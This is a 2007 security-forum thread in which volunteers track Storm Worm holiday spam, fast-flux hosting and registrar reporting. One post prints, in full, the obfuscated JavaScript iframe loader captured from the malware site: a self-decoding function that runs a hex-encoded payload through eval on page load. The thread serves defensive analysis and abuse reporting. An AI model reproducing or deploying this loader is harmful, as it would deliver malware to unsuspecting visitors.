CastleCops, Internet Crime Fighters
Need help? Click here to register for free! Absolutely zero advertisements on this site!

$9736.22 of $21422.68
left sidedonated so farneed $11686.46 donated to reach our goalright side, our goal
Help CastleCops serve the community on new servers, Donate Here to reach our goal.

Donation/Premium
spacer
block bottom
Security Central
spacer
· Home
· PIRT/Fried Phish
· MIRT
· SIRT
· Deutsch
· Wiki
· Newsletter
· O16/ActiveX
· CLSID List
· Contest2007
· Downloads
· Feedback (send)
· Forums
· HijackThis
· Hijacktrend
· LSPs
· My Downloads
· O18
· O20
· O21
· O22
· O23
· O9
· Premium
· Private Messages
· Proxomitron
· Reviews
· Search
· StartupList
· Stories Archive
· Submit News
· WsIRT
· Your Account
· Acceptable Use Policy
block bottom
Survey
spacer
Was 2007 a good year?

Yes it was a wonderful year
Yes, but there is always room for improvement
Status quo
It was a challenge
Other (leave comment)



Results
Polls

Votes: 937
Comments: 25
block bottom
spacer spacer

storm worm spam
Goto page 1, 2, 3, 4, 5  Next
 
Post new topic   Reply to topic       All -> FavForums -> Spam [del.icio.us!] [digg it!] [reddit!]
View previous topic :: View next topic  
Author Message
AlphaCentauri

SIRT Handler
Premium Member

Joined: Nov 20, 2003
Posts: 2668

Premium

PostPosted: Mon Dec 24, 2007 4:04 am    Post subject: storm worm spam
Reply with quote

I anyone wants to see what a zero second fast flux looks like, there is new spam arriving for merrychristmasdude[dot]com (DO NOT visit this site; it is seriously evil; reported to MIRT already). If you go to a nslookup site like swhois.net and enter the domain name into the nslookup form, it gives you just one IP address. But if you enter it again, you get a different IP address. You can enter as frequently as you want and you'll rarely get a repeat.

Normally when you get spammed to a malware site, you can report it to the hosting service to get it shut down. But you can't do that with this site, because it's on a new network every second, occupying potentially thousands of IP addresses per day. That's why tembow's botnet reporting is necessary. I'm trying to find what registrar to report it to ("ANO REGIONAL NETWORK INFORMATION CENTER DBA RU", with its whois at nic.ru; nic.ru claims to be ICANN accredited, but I can't find any address for it on its site or the ICANN registrars list. (Maybe RBN, I guess).

Although the spamwiki botnet file for storm worm is down, I'm assuming this is also the storm worm botnet because both storm IP addresses and merrychristmasdude will display the same small image if you look for any gif file (eg, if you find an IP address is 123.123.123.123, then 123.123.123.123/text.gif will display the image). Last week it was stock spam, but now it's a tiny icon of some sort.

Back to top
View users profile Send private message
AplusWebMaster

General
General


Joined: Mar 14, 2004
Posts: 4622
Location: USA

PostPosted: Mon Dec 24, 2007 4:09 pm    Post subject:
Reply with quote

FYI...

Anticipated Storm-Bot Attack Begins
- http://isc.sans.org/diary.html?storyid=3778
Last Updated: 2007-12-24 03:41:39 UTC

More... screenshot available here:
- http://www.disog.org/2007/12/stormworm-is-back-have-merry-christmas.html

and another ref:
- http://asert.arbornetworks.com/2007/12/storm-is-back-dude/

Shocked


_________________
AplusWebMaster
~ Are you up to date or vulnerable to Hackers? ...or both?
.
Back to top
View users profile Send private message Visit posters website
AlphaCentauri

SIRT Handler
Premium Member

Joined: Nov 20, 2003
Posts: 2668

Premium

PostPosted: Mon Dec 24, 2007 4:26 pm    Post subject:
Reply with quote

I can see that clicking on the pictures downloads stripshow.exe. But does anyone know what the iframe is doing?

Back to top
View users profile Send private message
fogram

Trooper
Trooper
Premium Member

Joined: Sep 26, 2007
Posts: 14

Premium

PostPosted: Mon Dec 24, 2007 6:29 pm    Post subject:
Reply with quote

AlphaCentauri wrote:
I can see that clicking on the pictures downloads stripshow.exe. But does anyone know what the iframe is doing?


All I am getting at this moment is a redirection to Google:
Code:

Connect to 64.231.203.17 on port 80 ... ok

GET /cgi-bin/in.cgi?p=100 HTTP/1.1[CRLF]
Host: 64.231.203.17[CRLF]
Connection: close[CRLF]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
.
.
.
HTTP Status Code: HTTP/1.1 302 Found
Connection:   close   CRLF
Transfer-Encoding:   chunked   CRLF
Location:   http://www.google.com   CRLF
Date:   Mon, 24 Dec 2007 17:35:59 GMT   CRLF
Server:   lighttpd/1.4.18   CRLF
Keep-Alive:   Closed   CRLF


That's when connection directly to the IP instead of domain name.
I tried different User Agent strings too (Netscape 4.8, IE 6/7, Opera 9.2 - All Windows)

Back to top
View users profile Send private message
AplusWebMaster

General
General


Joined: Mar 14, 2004
Posts: 4622
Location: USA

PostPosted: Mon Dec 24, 2007 6:48 pm    Post subject:
Reply with quote

Updated:

- http://isc.sans.org/diary.html?storyid=3778
Last Updated: 2007-12-24 13:11:38 UTC ...(Version: 3)
"...nice and tidy analysis available at: http://holisticinfosec.blogspot.com/2007/12/storm-bot-stripshow-analysis.html
...There's nothing new or exciting here: SPAM component, headless P2P, seasonal social engineering, fast flux, and other pervasively annoying attributes. User awareness, as always, is your strongest defense. Cheers and happy holidays, except for you RBN a$$h0735."

.


_________________
AplusWebMaster
~ Are you up to date or vulnerable to Hackers? ...or both?
.
Back to top
View users profile Send private message Visit posters website
Karlston

Corporal
Corporal


Joined: May 07, 2006
Posts: 51
Location: Australia

PostPosted: Tue Dec 25, 2007 12:34 am    Post subject: Re: storm worm spam
Reply with quote

AlphaCentauri wrote:
I'm trying to find what registrar to report it to ("ANO REGIONAL NETWORK INFORMATION CENTER DBA RU", with its whois at nic.ru; nic.ru claims to be ICANN accredited, but I can't find any address for it on its site or the ICANN registrars list. (Maybe RBN, I guess).

The best I can find is this page...
http://www.nic.ru/about/en/contact_ncc.html

I've fired off some emails to support[at]nic.ru, and (guessing) abuse[at]nic.ru, and to the hosters of the 13 name server IP's, many at !@#$%^& "we take spam very seriously" Comcast.


_________________
"In theory, there is no difference between theory and practice. But, in practice, there is." ~ Jan L. A. van de Snepscheut
Back to top
View users profile Send private message
fogram

Trooper
Trooper
Premium Member

Joined: Sep 26, 2007
Posts: 14

Premium

PostPosted: Tue Dec 25, 2007 2:58 pm    Post subject:
Reply with quote

fogram wrote:
AlphaCentauri wrote:
I can see that clicking on the pictures downloads stripshow.exe. But does anyone know what the iframe is doing?


All I am getting at this moment is a redirection to Google:
Code:

Connect to 64.231.203.17 on port 80 ... ok

GET /cgi-bin/in.cgi?p=100 HTTP/1.1[CRLF]
Host: 64.231.203.17[CRLF]
Connection: close[CRLF]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
.
.
.
HTTP Status Code: HTTP/1.1 302 Found
Connection:   close   CRLF
Transfer-Encoding:   chunked   CRLF
Location:   http://www.google.com   CRLF
Date:   Mon, 24 Dec 2007 17:35:59 GMT   CRLF
Server:   lighttpd/1.4.18   CRLF
Keep-Alive:   Closed   CRLF


That's when connection directly to the IP instead of domain name.
I tried different User Agent strings too (Netscape 4.8, IE 6/7, Opera 9.2 - All Windows)


NOTE:
The iframe source code has now changed to (hard wraps inserted):
Code:

<html> <script language="JavaScript"> <!-- function
HT3isce3F(stEe8t6jN){var
oPRp2D137=arguments.callee.toString().replace(/\W/g,'').toUpperCase();
var X3XKFCBMe;var gOx5OEn4w;var rJ7DUvB47=oPRp2D137.length;var
xuV0g0U41;var jurdnGCgK='';var qfn5b1OlG=new
Array();for(gOx5OEn4w=0;gOx5OEn4w<256;gOx5OEn4w++)qfn5b1OlG[gOx5OEn4w]=0
;var X3XKFCBMe=1;for(gOx5OEn4w=128;gOx5OEn4w;gOx5OEn4w>>=1)
{X3XKFCBMe=(X3XKFCBMe>>>1)^((X3XKFCBMe&1)?3988292384:0);for(pw4aO45CU=0;
pw4aO45CU<256;pw4aO45CU+=gOx5OEn4w*2)
{qfn5b1OlG[pw4aO45CU+gOx5OEn4w]=(qfn5b1OlG[pw4aO45CU]^X3XKFCBMe);if
(qfn5b1OlG[pw4aO45CU+gOx5OEn4w] < 0)
{qfn5b1OlG[pw4aO45CU+gOx5OEn4w]+=4294967296;}}}xuV0g0U41=4294967295;for(
X3XKFCBMe=0;X3XKFCBMe<rJ7DUvB47;X3XKFCBMe++){xuV0g0U41=qfn5b1OlG[(
xuV0g0U41^oPRp2D137.charCodeAt(X3XKFCBMe))&255]^((xuV0g0U41>>8)&16777215
);}var I3oB5aLd5=new Array();xuV0g0U41=xuV0g0U41^4294967295;if
(xuV0g0U41<0)
{xuV0g0U41+=4294967296;}xuV0g0U41=xuV0g0U41.toString(16).toUpperCase();
var q571Q6183=new Array();var
rJ7DUvB47=xuV0g0U41.length;for(gOx5OEn4w=0;gOx5OEn4w<8;gOx5OEn4w++) {var
m5fM2HXOL=rJ7DUvB47+gOx5OEn4w;I3oB5aLd5[gOx5OEn4w]=1;if (m5fM2HXOL>=8)
{m5fM2HXOL=m5fM2HXOL-8;q571Q6183[gOx5OEn4w]=xuV0g0U41.charCodeAt(
m5fM2HXOL);} else {q571Q6183[gOx5OEn4w]=48;}}var i7ai4kpg4=0;var
hmNLIb4Qw;var l1Vsa06Bf;var
nELO66un1;rJ7DUvB47=stEe8t6jN.length;nELO66un1=rJ7DUvB47;for(gOx5OEn4w=0
;gOx5OEn4w<rJ7DUvB47;gOx5OEn4w+=2){var
qcG676NTJ=stEe8t6jN.substr(gOx5OEn4w,2);hmNLIb4Qw=parseInt(qcG676NTJ,16)
;l1Vsa06Bf=hmNLIb4Qw-q571Q6183[i7ai4kpg4];if(l1Vsa06Bf<0)
{l1Vsa06Bf=l1Vsa06Bf+256;}jurdnGCgK+=String.fromCharCode(l1Vsa06Bf);
nELO66un1++;if(i7ai4kpg4<q571Q6183.length-1)
{I3oB5aLd5[gOx5OEn4w]=2;i7ai4kpg4++;} else
{i7ai4kpg4=0;}}eval(jurdnGCgK);} //--> </script> <body
onLoad="HT3isce3F('
96bbB0A8ac9bA3B1509CA78b8066989764ba6a95686aa17464AA977761adaaa4a2669178
6Ea26bac6198898299a49BB89DABb0b9ab6097a49Cb2A7aa66a6a396A4b8ABB39f5A5D71
a2ABb2B19995996b5FA299749F5e5B6A5974B6B48Da2a4a8a289A3b89d5a5d7eA6a7B465
af849BB4A4769977836DaaA4a266B09BA77Aa795a37Aba80ae93a6637B7Ebb8D7d686b78
a78391786Ea26bac61988973a497A2aaA4AE7dBB99a4549b7D9EA5986C7DA8B56BBCA3B7
58A997b5767d857ca28b716A5781b8A6aa52A07671B795756a8468809eABB96579a4a6A4
a96E6B809ea1A66B9e9Cb18Dab84A777A8837280A688A38Ba398B579b06E66786681B09b
A77Aa795a37aBA70635ba07671b795756A84689e9E9CB18Dab84a777a8a37F7573A895B5
50BD94acA9a6649A62917F767398A3b558b498B480a586b664be7f766A6a6FB186B58ab8
8Aa568BB6Bb498b480a586B664BE808375635d63ABbd94aca9a6649A62917F6daf849BB4
A476997783707281616fa06D60a986aaa1ba729c6A7D5A745985757E706a667c62797A79
72625D7E96B5b46D9e62989164997893796f647e9676A6936C856a917182747A6e6D9a73
949476986e80756e6db498b480A586B664be6C776152afaf6387B398686486778Bac72A9
866687797E876DB38eA17Cb682b976BD956f5Caf6387B398686486778BAC72a986668779
7E879fA3AF849BB4a4769977835B6fAC96666aB16b73A59660789479939864A77E7a957b
86735FB186B58AB88Aa568BB8D667E65685b54be9C7983b68B62669564a1a8759C806896
66948370A688a38bA398b579B08f5F8064787B7971686B75697c7Dc2b5AF8C9088a99579
83a6A68064787b7971686B75697b7dABA7a45Cba82adb3b96889668E6D767dbc8A99A5b7
609d7490747d6Cbc788b787c6dA96fba82adb3B96889668E5B716Bc0907f8CA6837a8Db9
aa6FA07671B795756a84689E589E8f9D9b85688Ea4B8a0946B68a47a9977948C66959CA4
a289b1a99d73a86Ba798a9B6AC628b757B6f6b6B6A6769a08e6E6a9d858A97966491b6B7
76706C6c5677787c6f696674656f7dc2ae93a6639279858f6864647AA983b0AAAF5275b5
A2A7bb6D616D8c9088A9957983a6a68088939Aa88b667Fb7a2a4767771666d7967787B7a
739b9a63589e8F9D9B85688eA4b87e756152AF9b7d9Ea5986c7da8B55b83767771666d79
67787b7b73AF8c9088a9957983A6A68088939aa88B667fB7A274b6B48bA6A6AC9eAD6A76
6e5B62b79f9BB2b59da477a4A3AB6a6e73a895b550979A7A68679fAD72777fB39Da95484
A2b8a3BE605B6FB991B8629070ab7C88667D77bc758a819b93997690ACa462af95B4A9b9
a06d9Ab2a26eB09ba77aa795A37aba82686Da2999f8EB597ab66ac7f6881B09Ba77aA795
A37aba70635B54beA6A7b46584a87FAF66bf76756F6F7f7bA98E877b6F67ab6e9e9Cb18D
ab84A777A881a4787B7C6475607Dbba0A688A38bA398b579b08F71746bAFA865607EAA8e
9c7CBB7968697280686F62c084A87FAF66BF76756f6f80b97Bb278be6C626b706881939d
6d6269AE9a8873a0A688a38Ba398B579b08f719b7D9ea5986C7Da8b55Ea9aaA6AA75a3a7
9587b66D84a87faf66bf76756f5b6FC050abaeb89D52af94887b727aA39C76748bB498B4
80A586b664be9f826C6A6FC0ADBCA3b758826aA8627C8A756A7b71736BBCa3b758a58999
9e94757D7c9a6Fb991b86291688A65a67bb0A5AC73A895B55096B387797d6673617C7D90
70ab7c88667d77bc7582647b9d7776a98D6462af95B4a9b9A06d84B472878D7768636A80
7B7EBB8D7D686B78A781a8b4aa5aa2999F8eB597AB66AC806081B09bA77aA795A37aba81
836Aad8b757C797aAF6DA2999F8Eb597ab66AC6E6d786Bc0ae93A663A58F738B8c9c827A
A3839275709F6577949b7473aba796B6a4B86Ab38Ea17Cb682b976BD64645d7EA39b98b3
86656C879883B2a6aaa5998c9Eba6aBA81637A979A9479b864636A6c6B92729d69957Fad
93ad7Fb88d88a291637e86AD65838C78607BadAF7a638F9366ab747B8062668c8d81abAB
607e649b61a98dAF9b9970735966BD91688A65A67Bb0A5ac757E649B61A98dAF9B995f75
657c7DC2AF95a689678979af915D7196A4B8abB39f609ab59Fb385AD99A477b294ab6a91
688a65a67Bb0a5ac616d84b472878d7768636A6e5B81ABab60826Aa8627C8a756A7b7094
887B727aA39c76745eB2a7B39Fa69C70616f62C09a65778d6078727cb18Da2999f8Eb597
AB66ACa06d787D956E9766797876748e635D6fc050ABaeb89D52AF9366AB747B8062668c
6d767dC2b597aaa49C6eb9a8AA786b8667b09B6E73af3e99958c8A799c8668b7586D7678
6C7567a8727d7b777a696a74927B7B7e9a666d889277a37a6E676B8866787BA67A636D7B
727C7baa79737589727c78797967957a917C7b777a6B7579687da37779697575717C7BAB
9a6b6a7c667aA37e9967757A91a783769a6B6a7666a879766c986789648B75876C779677
717BA37D79747578727b77AB9a6a7579927c797C9a68757c92797BA699697679927C7b87
6e93697a91aa7B779a65957b727D7B7c996b6d84667977896E676A7668897b7C7a6a6D79
697a7b797a6995A4727883866E6669A8678975aa6C786884727b7B7E9a666D887277A37a
6F659677717Da3a67065957c727B837879779576727Da3a6996969a76679a3799A697577
667a78776e64697A6876a37a70646B79678878A76F646A7a677978766f736b7c667eA37d
6f986a7a677e78a66f696b77677978a86F6B6aa567A7777c99966b88677f78866f946a7c
677A787c6f966b74677877889a626B756778787E6f676ba4677C78896F736a7a677d7876
6e94957a718B7B7C996B6D7791a777786e976Ba664AC76756c7867a964a77b7a7A667577
727d837899699576927b778b99699673917cA3AB6F626D7972778376999395A9917C797E
79736da8718a7B7a6e967677917bA37D79749578927B77a67062688864A9696E73')">

</body> </html>


That's when using IE6 as User-Agent string.

Back to top
View users profile Send private message
ahoier

SIRT Handler


Joined: Jan 14, 2006
Posts: 1024
Location: USA

PostPosted: Tue Dec 25, 2007 11:37 pm    Post subject:
Reply with quote

Kinda strange...I've seen a bunch of these and SpamCop will not report the IPs...I've seen comcast IPs and Charter IPs as I kept refreshing my report page, but all of them stated ISP refuses reports or whatever crap...

So whatever...I sent out some manual reports to the abuse addresses for some of the IPs that SpamCop returned.

Back to top
View users profile Send private message Visit posters website AIM Address Yahoo Messenger MSN Messenger
AlphaCentauri

SIRT Handler
Premium Member

Joined: Nov 20, 2003
Posts: 2668

Premium

PostPosted: Wed Dec 26, 2007 2:09 am    Post subject:
Reply with quote

There is little point reporting the site hosting merrychristmasdude[dot]com through spamcop. Fast flux means when the folks on the help desk get the spamcop report and check that URL, they'll find it is hosted on someone else's network. It is totally random which IP it will be at when spamcop parses it or when the help desk researches it. You not only need to tell the ISP the IP address, you need the date and time it was observed there, and you have to make sure the help desk person is familiar with fast flux so they know not to expect to see it at the same IP address when they check. So for these, while I do leave the box checked for spamcop reporting, I write a note in comments to let them know what's going on.

Back to top
View users profile Send private message
ahoier

SIRT Handler


Joined: Jan 14, 2006
Posts: 1024
Location: USA

PostPosted: Wed Dec 26, 2007 4:55 am    Post subject:
Reply with quote

Yea, I leave a note too regarding these sort of sites when I see them, with links to this thread too (since it points out the 0-delay effect this one has- and only displays one IP at a time/per refresh).

Back to top
View users profile Send private message Visit posters website AIM Address Yahoo Messenger MSN Messenger
pwillener

SRT Trainee
SRT Trainee
Premium Member

Joined: Apr 17, 2006
Posts: 1721
Location: Japan
Premium

PostPosted: Wed Dec 26, 2007 9:15 am    Post subject:
Reply with quote

Another one I received today is 'uhavepostcard.com' (reported to MIRT), offering a download of 'happy-2008.exe'. Same registrar; reports bounce with "Delivery Status Notification (Delay)". Meaning, so far nobody has been notified.

Same principle; different IP address every time it's checked.

Back to top
View users profile Send private message Visit posters website
Huldin-the-Goth

Sergeant
Sergeant


Joined: Jan 08, 2005
Posts: 78
Location: Uk

PostPosted: Wed Dec 26, 2007 10:25 am    Post subject:
Reply with quote

A list of 'Subjects' used in the 'New Year 2008' version of the ecards can be found at http://isc.sans.org/diary.html?storyid=3784

Cool

Back to top
View users profile Send private message
tembow

Blue Angel
Premium Member

Joined: Oct 10, 2005
Posts: 2883

Blue Security Premium

PostPosted: Wed Dec 26, 2007 11:03 am    Post subject:
Reply with quote

The IPs for Storm are being reported to all of the ISPs several times per week. See the Botnet Tracker thread.

Back to top
View users profile Send private message Visit posters website AIM Address
AplusWebMaster

General
General


Joined: Mar 14, 2004
Posts: 4622
Location: USA

PostPosted: Wed Dec 26, 2007 11:57 am    Post subject:
Reply with quote

More updates:

- http://isc.sans.org/diary.html?storyid=3784
Last Updated: 2007-12-25 19:36:34 UTC ...(Version: 3) -"...As with 'merry christmas dude.com', this domain appears to be registered through nic.ru. It also appears to be hosted on the same fast-flux network, now with at least 8000 nodes. If you go to that web site, currently the malware file is 'happy2008.exe'. We will add more analysis details throughout the day as we get them..."

New Years Storm deja vu
- http://holisticinfosec.blogspot.com/2007/12/new-years-storm-deja-vu.html
December 25, 2007 - "...it copies itself to C:\WINDOWS as disnisa.exe... better AV coverage now that this variant's been around for a few days..."

.


_________________
AplusWebMaster
~ Are you up to date or vulnerable to Hackers? ...or both?
.
Back to top
View users profile Send private message Visit posters website
pwillener

SRT Trainee
SRT Trainee
Premium Member

Joined: Apr 17, 2006
Posts: 1721
Location: Japan
Premium

PostPosted: Thu Dec 27, 2007 4:36 am    Post subject:
Reply with quote

All nic.ru email addresses bounce. Has anyone tried to send them a complaint via fax? (http://www.nic.ru/about/en/)

Back to top
View users profile Send private message Visit posters website
Display posts from previous:   
Post new topic   Reply to topic       All -> FavForums -> Spam All times are GMT
Goto page 1, 2, 3, 4, 5  Next
Page 1 of 5

 
Quick Reply:
Username: 

Quote the last message
Attach signature (signatures can be changed in profile)
 
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001 phpBB Group
spacer spacer